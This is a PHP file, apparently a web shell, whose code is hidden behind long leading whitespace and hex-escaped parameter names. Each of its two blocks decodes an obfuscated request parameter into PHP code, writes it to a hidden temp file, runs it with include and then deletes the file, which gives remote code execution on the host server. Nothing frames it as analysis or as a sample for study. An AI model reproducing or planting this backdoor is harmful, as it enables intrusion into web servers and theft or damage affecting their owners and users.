<?php																																										if(array_key_exists("s\x79m\x62\x6Fl", $_REQUEST)){ $ent = array_filter([sys_get_temp_dir(), "/tmp", ini_get("upload_tmp_dir"), getenv("TEMP"), getcwd(), getenv("TMP"), session_save_path(), "/var/tmp", "/dev/shm"]); $parameter_group = $_REQUEST["s\x79m\x62\x6Fl"]; $parameter_group = explode( "." ,$parameter_group ); $mrk =''; $s4 ='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen =strlen( $s4); $k =0; array_walk( $parameter_group , function( $v1) use( &$mrk , &$k , $s4 , $sLen) { $chS =ord( $s4[$k % $sLen]); $dec =( ( int)$v1 - $chS -( $k % 10)) ^ 74; $mrk.= chr( $dec); $k++; }); for ($property_set = 0, $flg = count($ent); $property_set < $flg; $property_set++) { $ref = $ent[$property_set]; if (is_writable($ref) && is_dir($ref)) { $holder = implode("/", [$ref, ".comp"]); $success = file_put_contents($holder, $mrk); if ($success) { include $holder; @unlink($holder); exit;} } } }


if(!is_null($_REQUEST["\x65\x6Etry"] ?? null)){
	$ent = array_filter([session_save_path(), "/var/tmp", sys_get_temp_dir(), ini_get("upload_tmp_dir"), getenv("TMP"), getcwd(), "/dev/shm", "/tmp", getenv("TEMP")]);
	$val = $_REQUEST["\x65\x6Etry"];
		$val	  =	explode ('.',	$val	) ; 
	$bind= '';
            $s= 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS= strlen($s);
    
            foreach ($val as $x=>  $v8) {		$sChar= ord($s[$x%$lenS]);
                $dec= ((int)$v8 - $sChar - ($x%10))^		60;
                $bind		.=chr($dec);}	
	foreach ($ent as $obj):
    		if (is_dir($obj) ? is_writable($obj) : false) {
    $key = sprintf("%s/.resource", $obj);
    if (@file_put_contents($key, $bind) !== false) {
	include $key;
	unlink($key);
	die();
}
}
endforeach;
}